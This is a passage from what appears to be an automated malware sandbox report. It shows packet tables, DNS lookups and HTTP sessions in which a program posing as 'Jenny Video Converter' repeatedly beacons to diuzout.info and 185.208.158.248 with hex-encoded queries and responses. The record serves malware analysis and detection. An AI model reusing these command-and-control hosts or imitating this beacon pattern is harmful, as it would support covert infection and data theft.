                                                                              Oct 8, 2024 04:14:50.082515001 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.082608938 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.087639093 CEST8063225185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.773447037 CEST8063225185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.773595095 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.889216900 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.889484882 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.894361973 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.894439936 CEST8063225185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:50.894449949 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.894490957 CEST6322580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.894640923 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:50.899475098 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:51.589812994 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:51.590209007 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:51.701644897 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:51.707032919 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:51.936835051 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:51.936933041 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.045609951 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.045907021 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.051090956 CEST8063226185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.051170111 CEST6322680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.051439047 CEST8063227185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.051650047 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.051650047 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.056561947 CEST8063227185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.757633924 CEST8063227185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.757843971 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.896616936 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.896886110 CEST6322880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.901887894 CEST8063228185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.902060986 CEST6322880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.902107954 CEST6322880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.902172089 CEST8063227185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:52.902349949 CEST6322780192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:52.907057047 CEST8063228185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:53.599946976 CEST8063228185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:53.600074053 CEST6322880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:53.717209101 CEST6322880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:53.717464924 CEST6322980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:53.722443104 CEST8063229185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:53.722527981 CEST8063228185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:53.722553968 CEST6322980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:53.722630978 CEST6322980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:53.722675085 CEST6322880192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:53.727540970 CEST8063229185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:54.413630009 CEST8063229185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:54.413726091 CEST6322980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:54.535609961 CEST6322980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:54.535964012 CEST6323080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:54.540935040 CEST8063229185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:54.540973902 CEST8063230185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:54.541003942 CEST6322980192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:54.541045904 CEST6323080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:54.541883945 CEST6323080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:54.546756029 CEST8063230185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:55.227144003 CEST8063230185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:55.227231026 CEST6323080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:55.354347944 CEST6323080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:55.354850054 CEST6323180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:55.359672070 CEST8063230185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:55.359731913 CEST6323080192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:55.359759092 CEST8063231185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:55.360060930 CEST6323180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:55.360884905 CEST6323180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:55.365809917 CEST8063231185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:56.065834999 CEST8063231185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:56.066015959 CEST6323180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:56.188162088 CEST6323180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:56.188395023 CEST6323280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:56.193423986 CEST8063232185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:56.193499088 CEST6323280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:56.193598032 CEST6323280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:56.193702936 CEST8063231185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:56.193866014 CEST6323180192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:56.198493004 CEST8063232185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:56.908514977 CEST8063232185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:56.908567905 CEST6323280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.031285048 CEST6323280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.031613111 CEST6323380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.036866903 CEST8063232185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:57.036922932 CEST6323280192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.036978006 CEST8063233185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:57.037035942 CEST6323380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.037122011 CEST6323380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.043513060 CEST8063233185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:57.773322105 CEST8063233185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:57.773482084 CEST6323380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.891436100 CEST6323380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.891720057 CEST6323480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.896918058 CEST8063234185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:57.896994114 CEST8063233185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:57.897151947 CEST6323480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.897152901 CEST6323480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.897212982 CEST6323380192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:57.902065039 CEST8063234185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:58.597233057 CEST8063234185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:58.597301006 CEST6323480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:58.721503019 CEST6323480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:58.721858025 CEST6323580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:58.726854086 CEST8063234185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:58.726918936 CEST6323480192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:58.726938963 CEST8063235185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:58.726994991 CEST6323580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:58.727169037 CEST6323580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:58.731975079 CEST8063235185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:59.415838003 CEST8063235185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:59.420310974 CEST6323580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:59.531579971 CEST6323580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:59.532044888 CEST6323680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:59.536789894 CEST8063235185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:59.536992073 CEST8063236185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:14:59.539335966 CEST6323580192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:59.539343119 CEST6323680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:59.542429924 CEST6323680192.168.2.6185.208.158.248
                                                                              Oct 8, 2024 04:14:59.547265053 CEST8063236185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:15:00.248508930 CEST8063236185.208.158.248192.168.2.6
                                                                              Oct 8, 2024 04:15:00.249206066 CEST6323680192.168.2.6185.208.158.248

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 8, 2024 04:13:15.987190008 CEST53607361.1.1.1192.168.2.6
                                                                              Oct 8, 2024 04:13:18.456633091 CEST53584611.1.1.1192.168.2.6
                                                                              Oct 8, 2024 04:13:20.605865002 CEST6193553192.168.2.61.1.1.1
                                                                              Oct 8, 2024 04:13:20.613836050 CEST53619351.1.1.1192.168.2.6
                                                                              Oct 8, 2024 04:13:51.050853968 CEST5899453192.168.2.6141.98.234.31
                                                                              Oct 8, 2024 04:13:51.289334059 CEST5358994141.98.234.31192.168.2.6

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 8, 2024 04:13:20.605865002 CEST192.168.2.61.1.1.10xd09bStandard query (0)212.20.149.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                              Oct 8, 2024 04:13:51.050853968 CEST192.168.2.6141.98.234.310x8e90Standard query (0)diuzout.infoA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 8, 2024 04:13:20.613836050 CEST1.1.1.1192.168.2.60xd09bName error (3)212.20.149.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                              Oct 8, 2024 04:13:51.289334059 CEST141.98.234.31192.168.2.60x8e90No error (0)diuzout.info185.208.158.248A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • diuzout.info
                                                                              • 31.214.157.226

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.663161185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:13:51.788804054 CEST319OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf712c5ec93993c HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:13:52.485299110 CEST1236INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:13:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 34 36 36 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 62 37 36 35 62 62 33 37 34 66 30 36 37 62 37 33 32 35 36 63 30 65 30 64 35 30 65 63 61 34 32 63 64 37 64 62 30 31 62 66 64 33 32 38 38 33 38 65 33 31 36 62 38 36 37 63 37 35 61 61 35 65 61 34 65 65 37 35 62 37 66 34 33 65 63 32 66 36 36 39 34 33 64 37 39 38 63 66 66 31 32 64 65 65 64 39 30 39 39 32 35 63 39 36 61 39 63 31 33 64 38 35 30 38 66 32 31 62 31 35 39 61 64 65 61 35 39 33 66 65 63 37 62 64 37 65 33 37 65 62 63 38 35 65 63 64 35 34 61 65 36 33 35 63 66 31 33 32 62 35 66 35 62 33 65 65 31 32 34 37 36 31 36 36 37 62 39 65 38 38 37 66 66 38 36 32 64 35 31 65 64 35 61 37 65 33 66 66 63 32 62 34 33 66 33 66 39 66 39 38 61 66 63 33 34 37 61 61 34 65 64 34 37 39 39 38 32 66 65 36 34 32 35 31 [TRUNCATED]
                                                                              Data Ascii: 46667b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592deb765bb374f067b73256c0e0d50eca42cd7db01bfd328838e316b867c75aa5ea4ee75b7f43ec2f66943d798cff12deed909925c96a9c13d8508f21b159adea593fec7bd7e37ebc85ecd54ae635cf132b5f5b3ee124761667b9e887ff862d51ed5a7e3ffc2b43f3f9f98afc347aa4ed479982fe642512a36aee9cd5b365d46104283164a753c8c3a43130b8cd06a605b9a837b8c5cb3b7c2810d130e90defd7be194dd33919c155dbf3689e28a9945daafcd5aede3a27bf72b8ed0a90a9be6d5ca399f520ace084831ce715e25a80476fceabc0fed95465a19cf03ba77c830d37ab22df39d9991ece54ab33071f4fcbd76d563a526585f78a2f3267490ec9c5af1210f5dcbbe9dd347479e02183c61b0a4298b4c30a4645d47d75513b4cfdd3d2ceeecb559d226d4afb76318228b6c49278824ac28c3e180b7f9cf796e01d0fa6248bdd166d02db29cdf09816743d7b993502ed57477765984ddab1bde631aacfc318568729c8425686b3de67cc503bbe76e3282fad66835517cba4a4ae64aec3129346d5c0c24fb317be49f4adb06590af27af3137123fc29d7115e3a0cb4d72e3273c34151dd730a843a3019346d5aacd934bf242889eb2c12f10d32820ba825cc75b04024fd [TRUNCATED]
                                                                              Oct 8, 2024 04:13:52.485327959 CEST98INData Raw: 30 66 31 61 62 31 66 63 62 66 64 32 32 66 34 61 35 62 61 39 62 34 30 37 66 32 37 38 37 35 66 63 61 64 62 34 34 65 33 31 65 61 36 32 34 36 33 32 33 66 31 39 38 34 39 62 32 64 65 34 63 35 65 36 61 61 39 63 31 33 32 63 31 63 38 39 62 64 62 64 64 62
                                                                              Data Ascii: 0f1ab1fcbfd22f4a5ba9b407f27875fcadb44e31ea6246323f19849b2de4c5e6aa9c132c1c89bdbddbb6a83d8050
                                                                              Oct 8, 2024 04:13:55.147404909 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:13:55.430424929 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:13:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.663163185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:13:55.582179070 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:13:56.276204109 CEST1190INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:13:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 33 64 36 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 63 38 66 63 66 66 35 31 65 31 39 65 62 62 64 35 35 65 39 30 33 63 61 66 66 38 64 65 37 39 35 38 37 34 64 38 30 34 37 64 31 65 34 64 63 32 61 33 30 61 31 35 32 66 66 64 36 63 64 30 37 32 39 65 39 37 64 35 39 61 64 37 35 66 36 36 63 61 38 33 32 35 33 64 65 66 63 64 33 30 62 64 65 34 31 63 38 37 65 61 65 31 34 66 61 33 39 38 66 32 36 65 34 31 30 61 64 36 31 63 35 34 64 62 38 65 35 35 30 65 63 35 61 37 61 35 64 65 62 32 31 36 64 39 36 33 62 36 37 38 65 66 34 31 37 63 35 66 31 39 37 39 62 32 35 63 66 36 65 39 32 30 38 64 39 35 30 38 62 32 30 62 37 35 39 62 33 65 39 35 34 32 37 65 38 36 35 64 30 66 63 36 37 62 64 38 61 66 31 64 33 34 63 65 63 33 66 63 39 31 36 33 35 35 36 35 63 32 35 66 64 32 37 37 33 31 36 36 34 62 38 65 38 39 33 66 66 38 36 32 38 35 62 65 37 35 63 37 62 32 31 66 35 32 65 35 62 65 39 66 35 65 66 39 32 66 38 33 61 37 33 62 61 65 38 34 37 39 38 38 31 66 62 37 61 32 37 31 [TRUNCATED]
                                                                              Data Ascii: 3d667b69c953804b26b565fe95b321bd19a55fc8fcff51e19ebbd55e903caff8de795874d8047d1e4dc2a30a152ffd6cd0729e97d59ad75f66ca83253defcd30bde41c87eae14fa398f26e410ad61c54db8e550ec5a7a5deb216d963b678ef417c5f1979b25cf6e9208d9508b20b759b3e95427e865d0fc67bd8af1d34cec3fc91635565c25fd27731664b8e893ff86285be75c7b21f52e5be9f5ef92f83a73bae8479881fb7a2718b56af19acbb07bd06d05363365aa5dcbddad3925b9cc10ba03b1bc37bedbca3475200bd330e01aeccfb80451d33e12da54def0699c2db79655a1e3cea9c33a3dbc78b8f30b93a8b6715aa087ff20a9f89b8316f316e1599e4d6cccbfc0fdd84a6ca59cf03da96a8f0829a921dc32de9f00cb56b7361a1a55d4d66c5925556c8ffd8e2a2c6b4712d1c0b1120dfcd0b9f7dc307a71e23f85c20e0a4795b4c6035240d463745a3b44e6d1d2c7f1cf57823d6a50ff783d9c2abec5977f8a54cb8d291e15609dfe80eb1d06b82e82dc187703dd37c7f5980a683471942b03e855587c648746deb8a3e73faad2dc115a8e33c146488abbdd64d2513bbc69eb2838b17a885103c6adaeaf6fa7c0079b4ac8dfce43b312b345ebacb76d91ab2eaa24360d29c5827c02e8a4cc5370ea2832291418df25ab4fa0019345dcbece9055f04b8a80b0c01b0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.663165185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:13:56.394890070 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:13:57.074873924 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:13:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:13:57.186307907 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:13:57.430228949 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:13:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.663166185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:13:57.550920963 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:13:58.256364107 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:13:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.663167185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:13:58.380295038 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:13:59.060466051 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:13:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:13:59.171472073 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:13:59.411493063 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:13:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.663168185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:13:59.552522898 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:00.235232115 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:00.342839956 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:00.578231096 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
